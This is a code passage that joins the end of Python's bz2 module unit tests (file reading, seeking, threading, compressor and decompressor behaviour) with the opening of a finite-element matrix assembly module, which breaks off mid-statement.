self.assertEqual(list(iter(bz2f)), self.TEXT_LINES * 5)
def testClosedIteratorDeadlock(self):
# Issue #3309: Iteration on a closed BZ2File should release the lock.
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, next, bz2f)
# This call will deadlock if the above call failed to release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testWrite(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteChunks10(self):
with BZ2File(self.filename, "w") as bz2f:
n = 0
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteNonDefaultCompressLevel(self):
expected = bz2.compress(self.TEXT, compresslevel=5)
with BZ2File(self.filename, "w", compresslevel=5) as bz2f:
bz2f.write(self.TEXT)
with open(self.filename, "rb") as f:
self.assertEqual(f.read(), expected)
def testWriteLines(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.writelines)
bz2f.writelines(self.TEXT_LINES)
# Issue #1535500: Calling writelines() on a closed BZ2File
# should raise an exception.
self.assertRaises(ValueError, bz2f.writelines, ["a"])
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteMethodsOnReadOnlyFile(self):
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(b"abc")
with BZ2File(self.filename, "r") as bz2f:
self.assertRaises(OSError, bz2f.write, b"a")
self.assertRaises(OSError, bz2f.writelines, [b"a"])
def testAppend(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with BZ2File(self.filename, "a") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT * 2)
def testSeekForward(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekForwardAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(len(self.TEXT) + 150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwards(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def testSeekBackwardsAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
readto = len(self.TEXT) + 100
while readto > 0:
readto -= len(bz2f.read(readto))
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[100-150:] + self.TEXT)
def testSeekBackwardsFromEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
def testSeekBackwardsFromEndAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-1000, 2)
self.assertEqual(bz2f.read(), (self.TEXT * 2)[-1000:])
def testSeekPostEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwice(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwiceMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPreStart(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
def testSeekPreStartMultiStream(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT * 2)
def testFileno(self):
self.createTempFile()
with open(self.filename, 'rb') as rawf:
bz2f = BZ2File(rawf)
try:
self.assertEqual(bz2f.fileno(), rawf.fileno())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.fileno)
def testSeekable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.seekable())
bz2f.read()
self.assertTrue(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
src = BytesIO(self.DATA)
src.seekable = lambda: False
bz2f = BZ2File(src)
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
def testReadable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.readable())
bz2f.read()
self.assertTrue(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
def testWritable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertFalse(bz2f.writable())
bz2f.read()
self.assertFalse(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertTrue(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
def testOpenDel(self):
self.createTempFile()
for i in range(10000):
o = BZ2File(self.filename)
del o
if i % 100 == 0:
support.gc_collect()
def testOpenNonexistent(self):
self.assertRaises(OSError, BZ2File, "/non/existent")
def testReadlinesNoNewline(self):
# Issue #1191043: readlines() fails on a file containing no newline.
data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
with open(self.filename, "wb") as f:
f.write(data)
with BZ2File(self.filename) as bz2f:
lines = bz2f.readlines()
self.assertEqual(lines, [b'Test'])
with BZ2File(self.filename) as bz2f:
xlines = list(bz2f.readlines())
self.assertEqual(xlines, [b'Test'])
def testContextProtocol(self):
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1/0
except ZeroDivisionError:
pass
else:
self.fail("1/0 didn't raise an exception")
def testThreading(self):
# Issue #7205: Using a BZ2File from several threads shouldn't deadlock.
data = b"1" * 2**20
nthreads = 10
with BZ2File(self.filename, 'wb') as f:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
with support.start_threads(threads):
pass
def testMixedIterationAndReads(self):
self.createTempFile()
linelen = len(self.TEXT_LINES[0])
halflen = linelen // 2
with BZ2File(self.filename) as bz2f:
bz2f.read(halflen)
self.assertEqual(next(bz2f), self.TEXT_LINES[0][halflen:])
self.assertEqual(bz2f.read(), self.TEXT[linelen:])
with BZ2File(self.filename) as bz2f:
bz2f.readline()
self.assertEqual(next(bz2f), self.TEXT_LINES[1])
self.assertEqual(bz2f.readline(), self.TEXT_LINES[2])
with BZ2File(self.filename) as bz2f:
bz2f.readlines()
self.assertRaises(StopIteration, next, bz2f)
self.assertEqual(bz2f.readlines(), [])
def testMultiStreamOrdering(self):
# Test the ordering of streams when reading a multi-stream archive.
data1 = b"foo" * 1000
data2 = b"bar" * 1000
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(data1)
with BZ2File(self.filename, "a") as bz2f:
bz2f.write(data2)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), data1 + data2)
def testOpenBytesFilename(self):
str_filename = self.filename
try:
bytes_filename = str_filename.encode("ascii")
except UnicodeEncodeError:
self.skipTest("Temporary file name needs to be ASCII")
with BZ2File(bytes_filename, "wb") as f:
f.write(self.DATA)
with BZ2File(bytes_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
# Sanity check that we are actually operating on the right file.
with BZ2File(str_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testOpenPathLikeFilename(self):
filename = pathlib.Path(self.filename)
with BZ2File(filename, "wb") as f:
f.write(self.DATA)
with BZ2File(filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testDecompressLimited(self):
"""Decompressed data buffering should be limited"""
bomb = bz2.compress(b'\0' * int(2e6), compresslevel=9)
self.assertLess(len(bomb), _compression.BUFFER_SIZE)
decomp = BZ2File(BytesIO(bomb))
self.assertEqual(decomp.read(1), b'\0')
max_decomp = 1 + DEFAULT_BUFFER_SIZE
self.assertLessEqual(decomp._buffer.raw.tell(), max_decomp,
"Excessive amount of data was decompressed")
# Tests for a BZ2File wrapping another file object:
def testReadBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
self.assertFalse(bio.closed)
def testPeekBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testWriteBytesIO(self):
with BytesIO() as bio:
with BZ2File(bio, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
self.assertEqual(ext_decompress(bio.getvalue()), self.TEXT)
self.assertFalse(bio.closed)
def testSeekForwardBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwardsBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def test_read_truncated(self):
# Drop the eos_magic field (6 bytes) and CRC (4 bytes).
truncated = self.DATA[:-10]
with BZ2File(BytesIO(truncated)) as f:
self.assertRaises(EOFError, f.read)
with BZ2File(BytesIO(truncated)) as f:
self.assertEqual(f.read(len(self.TEXT)), self.TEXT)
self.assertRaises(EOFError, f.read, 1)
# Incomplete 4-byte file header, and block header of at least 146 bits.
for i in range(22):
with BZ2File(BytesIO(truncated[:i])) as f:
self.assertRaises(EOFError, f.read, 1)
class BZ2CompressorTest(BaseTest):
def testCompress(self):
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
bz2c = BZ2Compressor()
data = bz2c.compress(b'')
data += bz2c.flush()
self.assertEqual(data, self.EMPTY_DATA)
def testCompressChunks10(self):
bz2c = BZ2Compressor()
n = 0
data = b''
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
@support.skip_if_pgo_task
@bigmemtest(size=_4G + 100, memuse=2)
def testCompress4G(self, size):
# "Test BZ2Compressor.compress()/flush() with >4GiB input"
bz2c = BZ2Compressor()
data = b"x" * size
try:
compressed = bz2c.compress(data)
compressed += bz2c.flush()
finally:
data = None # Release memory
data = bz2.decompress(compressed)
try:
self.assertEqual(len(data), size)
self.assertEqual(len(data.strip(b"x")), 0)
finally:
data = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Compressor(), proto)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
bz2d = BZ2Decompressor()
text = b''
n = 0
while True:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
bz2d = BZ2Decompressor()
unused_data = b"this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, b"anything")
self.assertRaises(EOFError, bz2d.decompress, b"")
@support.skip_if_pgo_task
@bigmemtest(size=_4G + 100, memuse=3.3)
def testDecompress4G(self, size):
# "Test BZ2Decompressor.decompress() with >4GiB input"
blocksize = 10 * 1024 * 1024
block = random.getrandbits(blocksize * 8).to_bytes(blocksize, 'little')
try:
data = block * (size // blocksize + 1)
compressed = bz2.compress(data)
bz2d = BZ2Decompressor()
decompressed = bz2d.decompress(compressed)
self.assertTrue(decompressed == data)
finally:
data = None
compressed = None
decompressed = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Decompressor(), proto)
def testDecompressorChunksMaxsize(self):
bzd = BZ2Decompressor()
max_length = 100
out = []
# Feed some input
len_ = len(self.BIG_DATA) - 64
out.append(bzd.decompress(self.BIG_DATA[:len_],
max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data without providing more input
out.append(bzd.decompress(b'', max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data while providing more input
out.append(bzd.decompress(self.BIG_DATA[len_:],
max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
# Retrieve remaining uncompressed data
while not bzd.eof:
out.append(bzd.decompress(b'', max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
out = b"".join(out)
self.assertEqual(out, self.BIG_TEXT)
self.assertEqual(bzd.unused_data, b"")
def test_decompressor_inputbuf_1(self):
# Test reusing input buffer after moving existing
# contents to beginning
bzd = BZ2Decompressor()
out = []
# Create input buffer and fill it
self.assertEqual(bzd.decompress(self.DATA[:100],
max_length=0), b'')
# Retrieve some results, freeing capacity at beginning
# of input buffer
out.append(bzd.decompress(b'', 2))
# Add more data that fits into input buffer after
# moving existing data to beginning
out.append(bzd.decompress(self.DATA[100:105], 15))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[105:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_2(self):
# Test reusing input buffer by appending data at the
# end right away
bzd = BZ2Decompressor()
out = []
# Create input buffer and empty it
self.assertEqual(bzd.decompress(self.DATA[:200],
max_length=0), b'')
out.append(bzd.decompress(b''))
# Fill buffer with new data
out.append(bzd.decompress(self.DATA[200:280], 2))
# Append some more data, not enough to require resize
out.append(bzd.decompress(self.DATA[280:300], 2))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_3(self):
# Test reusing input buffer after extending it
bzd = BZ2Decompressor()
out = []
# Create almost full input buffer
out.append(bzd.decompress(self.DATA[:200], 5))
# Add even more data to it, requiring resize
out.append(bzd.decompress(self.DATA[200:300], 5))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_failure(self):
bzd = BZ2Decompressor()
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
# Previously, a second call could crash due to internal inconsistency
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
@support.refcount_test
def test_refleaks_in___init__(self):
gettotalrefcount = support.get_attribute(sys, 'gettotalrefcount')
bzd = BZ2Decompressor()
refs_before = gettotalrefcount()
for i in range(100):
bzd.__init__()
self.assertAlmostEqual(gettotalrefcount() - refs_before, 0, delta=10)
class CompressDecompressTest(BaseTest):
def testCompress(self):
data = bz2.compress(self.TEXT)
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
text = bz2.compress(b'')
self.assertEqual(text, self.EMPTY_DATA)
def testDecompress(self):
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
text = bz2.decompress(b"")
self.assertEqual(text, b"")
def testDecompressToEmptyString(self):
text = bz2.decompress(self.EMPTY_DATA)
self.assertEqual(text, b'')
def testDecompressIncomplete(self):
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
def testDecompressBadData(self):
self.assertRaises(OSError, bz2.decompress, self.BAD_DATA)
def testDecompressMultiStream(self):
text = bz2.decompress(self.DATA * 5)
self.assertEqual(text, self.TEXT * 5)
def testDecompressTrailingJunk(self):
text = bz2.decompress(self.DATA + self.BAD_DATA)
self.assertEqual(text, self.TEXT)
def testDecompressMultiStreamTrailingJunk(self):
text = bz2.decompress(self.DATA * 5 + self.BAD_DATA)
self.assertEqual(text, self.TEXT * 5)
class OpenTest(BaseTest):
"Test the open function."
def open(self, *args, **kwargs):
return bz2.open(*args, **kwargs)
def test_binary_modes(self):
for mode in ("wb", "xb"):
if mode == "xb":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "rb") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "ab") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_implicit_binary_modes(self):
# Test implicit binary modes (no "b" or "t" in mode string).
for mode in ("w", "x"):
if mode == "x":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "a") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_text_modes(self):
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
for mode in ("wt", "xt"):
if mode == "xt":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt") as f:
self.assertEqual(f.read(), text)
with self.open(self.filename, "at") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol * 2)
def test_x_mode(self):
for mode in ("x", "xb", "xt"):
unlink(self.filename)
with self.open(self.filename, mode) as f:
pass
with self.assertRaises(FileExistsError):
with self.open(self.filename, mode) as f:
pass
def test_fileobj(self):
with self.open(BytesIO(self.DATA), "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(BytesIO(self.DATA), "rb") as f:
self.assertEqual(f.read(), self.TEXT)
text = self.TEXT.decode("ascii")
with self.open(BytesIO(self.DATA), "rt") as f:
self.assertEqual(f.read(), text)
def test_bad_params(self):
# Test invalid parameter combinations.
self.assertRaises(ValueError,
self.open, self.filename, "wbt")
self.assertRaises(ValueError,
self.open, self.filename, "xbt")
self.assertRaises(ValueError,
self.open, self.filename, "rb", encoding="utf-8")
self.assertRaises(ValueError,
self.open, self.filename, "rb", errors="ignore")
self.assertRaises(ValueError,
self.open, self.filename, "rb", newline="\n")
def test_encoding(self):
# Test non-default encoding.
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
with self.open(self.filename, "wt", encoding="utf-16-le") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("utf-16-le")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt", encoding="utf-16-le") as f:
self.assertEqual(f.read(), text)
def test_encoding_error_handler(self):
# Test with non-default encoding error handler.
with self.open(self.filename, "wb") as f:
f.write(b"foo\xffbar")
with self.open(self.filename, "rt", encoding="ascii", errors="ignore") \
as f:
self.assertEqual(f.read(), "foobar")
def test_newline(self):
# Test with explicit newline (universal newline mode disabled).
text = self.TEXT.decode("ascii")
with self.open(self.filename, "wt", newline="\n") as f:
f.write(text)
with self.open(self.filename, "rt", newline="\r") as f:
self.assertEqual(f.readlines(), [text])
def test_main():
support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
CompressDecompressTest,
OpenTest,
)
support.reap_children()
if __name__ == '__main__':
test_main()
|
Assembly.py
|
from __future__ import print_function
import gc, os, sys
from copy import deepcopy
from warnings import warn
from time import time
import numpy as np
from scipy.sparse import coo_matrix, csc_matrix, csr_matrix
from ._LowLevelAssembly_ import _LowLevelAssembly_, _LowLevelAssemblyExplicit_, _LowLevelAssemblyLaplacian_
from ._LowLevelAssembly_ import _LowLevelAssembly_Par_, _LowLevelAssemblyExplicit_Par_
from .SparseAssemblyNative import SparseAssemblyNative, SparseAssemblyNativeCSR, SparseAssemblyNativeCSR_RecomputeDataIndex
from .RHSAssemblyNative import RHSAssemblyNative
from .ComputeSparsityPattern import ComputeSparsityPattern
# PARALLEL PROCESSING ROUTINES
import multiprocessing
import Florence.ParallelProcessing.parmap as parmap
__all__ = ['Assemble', 'AssembleForces', 'AssembleExplicit', 'AssembleMass', 'AssembleForm', 'AssembleFollowerForces']
def Assemble(fem_solver, function_spaces, formulation, mesh, material, Eulerx, Eulerp, boundary_condition):
if fem_solver.has_low_level_dispatcher:
return LowLevelAssembly(fem_solver, function_spaces[0], formulation, mesh, material, Eulerx, Eulerp)
else:
if mesh.nelem <= 600000:
return AssemblySmall(fem_solver, function_spaces, formulation, mesh, material, Eulerx, Eulerp, boundary_condition)
elif mesh.nelem > 600000:
print("Larger than memory system. Dask on disk parallel assembly is turned on")
return OutofCoreAssembly(fem_solver, function_spaces[0], formulation, mesh, material, Eulerx, Eulerp)
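# A typical call site, sketched here for orientation only - the variable names
# are whatever the driving FEM solver happens to use, not a fixed API:
#   stiffness, T, F, M = Assemble(fem_solver, formulation.function_spaces,
#                                 formulation, mesh, material, Eulerx, Eulerp,
#                                 boundary_condition)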
def LowLevelAssembly(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
t_assembly = time()
if not material.has_low_level_dispatcher:
raise RuntimeError("Cannot dispatch to low level module since material {} does not support it".format(type(material).__name__))
if formulation.fields == "electrostatics":
stiffness, T = _LowLevelAssemblyLaplacian_(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
fem_solver.assembly_time = time() - t_assembly
return stiffness, T[:,None], None, None
    # HACK TO DISPATCH TO EFFICIENT MASS MATRIX COMPUTATION
ll_failed = False
M = []
if fem_solver.analysis_type != "static" and fem_solver.is_mass_computed is False:
try:
t_mass_assembly = time()
from Florence.VariationalPrinciple._MassIntegrand_ import __TotalConstantMassIntegrand__
if fem_solver.recompute_sparsity_pattern:
M, I_mass, J_mass, V_mass = __TotalConstantMassIntegrand__(mesh, function_space, formulation, fem_solver.mass_type)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,(I_mass,J_mass)),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
else:
M, V_mass = __TotalConstantMassIntegrand__(mesh, function_space,
formulation, fem_solver.mass_type, fem_solver.recompute_sparsity_pattern,
fem_solver.squeeze_sparsity_pattern, fem_solver.indices, fem_solver.indptr,
fem_solver.data_global_indices, fem_solver.data_local_indices)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,fem_solver.indices,fem_solver.indptr),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
if M is not None:
fem_solver.is_mass_computed = True
t_mass_assembly = time() - t_mass_assembly
print("Assembled mass matrix. Time elapsed was {} seconds".format(t_mass_assembly))
except ImportError:
# CONTINUE DOWN
warn("Low level mass assembly not available. Falling back to python version")
ll_failed = True
if fem_solver.parallel:
stiffness, T, F, mass = ImplicitParallelLauncher(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
else:
stiffness, T, F, mass = _LowLevelAssembly_(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
if isinstance(F,np.ndarray):
F = F[:,None]
# SET FLAG AGAIN - NECESSARY
if ll_failed:
if mass is not None:
fem_solver.is_mass_computed = True
else:
mass = M
fem_solver.assembly_time = time() - t_assembly
return stiffness, T[:,None], F, mass
def AssemblySmall(fem_solver, function_spaces, formulation, mesh, material, Eulerx, Eulerp, boundary_condition):
t_assembly = time()
# GET MESH DETAILS
C = mesh.InferPolynomialDegree() - 1
nvar = formulation.nvar
ndim = formulation.ndim
nelem = mesh.nelem
nodeperelem = mesh.elements.shape[1]
ndof = nodeperelem*nvar
local_capacity = ndof*ndof
if fem_solver.recompute_sparsity_pattern is False:
indices, indptr = fem_solver.indices, fem_solver.indptr
if fem_solver.squeeze_sparsity_pattern is False:
data_global_indices = fem_solver.data_global_indices
data_local_indices = fem_solver.data_local_indices
if fem_solver.recompute_sparsity_pattern:
# ALLOCATE VECTORS FOR SPARSE ASSEMBLY OF STIFFNESS MATRIX - CHANGE TYPES TO INT64 FOR DoF > 1e09
I_stiffness=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
J_stiffness=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
V_stiffness=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.float64)
I_mass=[]; J_mass=[]; V_mass=[]
if fem_solver.analysis_type !='static' and fem_solver.is_mass_computed is False:
# ALLOCATE VECTORS FOR SPARSE ASSEMBLY OF MASS MATRIX - CHANGE TYPES TO INT64 FOR DoF > 1e09
I_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
J_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.int32)
V_mass=np.zeros(int((nvar*nodeperelem)**2*nelem),dtype=np.float64)
else:
V_stiffness=np.zeros(indices.shape[0],dtype=np.float64)
if fem_solver.analysis_type !='static' and fem_solver.is_mass_computed is False:
V_mass=np.zeros(indices.shape[0],dtype=np.float64)
T = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
mass, F = [], []
if fem_solver.has_moving_boundary:
F = np.zeros((mesh.points.shape[0]*nvar,1),np.float64)
if fem_solver.parallel:
        # COMPUTE ALL LOCAL ELEMENTAL MATRICES (STIFFNESS, MASS, INTERNAL & EXTERNAL TRACTION FORCES)
ParallelTuple = parmap.map(formulation,np.arange(0,nelem,dtype=np.int32),
function_spaces[0], mesh, material, fem_solver, Eulerx, Eulerp, processes= int(multiprocessing.cpu_count()/2))
for elem in range(nelem):
if fem_solver.parallel:
# UNPACK PARALLEL TUPLE VALUES
I_stiff_elem = ParallelTuple[elem][0]; J_stiff_elem = ParallelTuple[elem][1]; V_stiff_elem = ParallelTuple[elem][2]
t = ParallelTuple[elem][3]; f = ParallelTuple[elem][4]
            I_mass_elem = ParallelTuple[elem][5]; J_mass_elem = ParallelTuple[elem][6]; V_mass_elem = ParallelTuple[elem][7]
else:
            # COMPUTE ALL LOCAL ELEMENTAL MATRICES (STIFFNESS, MASS, INTERNAL & EXTERNAL TRACTION FORCES)
I_stiff_elem, J_stiff_elem, V_stiff_elem, t, f, \
I_mass_elem, J_mass_elem, V_mass_elem = formulation.GetElementalMatrices(elem,
function_spaces[0], mesh, material, fem_solver, Eulerx, Eulerp)
if fem_solver.recompute_sparsity_pattern:
# SPARSE ASSEMBLY - STIFFNESS MATRIX
SparseAssemblyNative(I_stiff_elem,J_stiff_elem,V_stiff_elem,I_stiffness,J_stiffness,V_stiffness,
elem,nvar,nodeperelem,mesh.elements)
if fem_solver.analysis_type != 'static' and fem_solver.is_mass_computed==False:
# SPARSE ASSEMBLY - MASS MATRIX
SparseAssemblyNative(I_mass_elem,J_mass_elem,V_mass_elem,I_mass,J_mass,V_mass,
elem,nvar,nodeperelem,mesh.elements)
else:
if fem_solver.squeeze_sparsity_pattern:
# SPARSE ASSEMBLY - STIFFNESS MATRIX
SparseAssemblyNativeCSR_RecomputeDataIndex(mesh,V_stiff_elem,indices,indptr,V_stiffness,elem,nvar)
if fem_solver.analysis_type != 'static' and fem_solver.is_mass_computed==False:
# SPARSE ASSEMBLY - MASS MATRIX
SparseAssemblyNativeCSR_RecomputeDataIndex(mesh,V_mass_elem,indices,indptr,V_mass,elem,nvar)
else:
# SPARSE ASSEMBLY - STIFFNESS MATRIX
V_stiffness[data_global_indices[elem*local_capacity:(elem+1)*local_capacity]] \
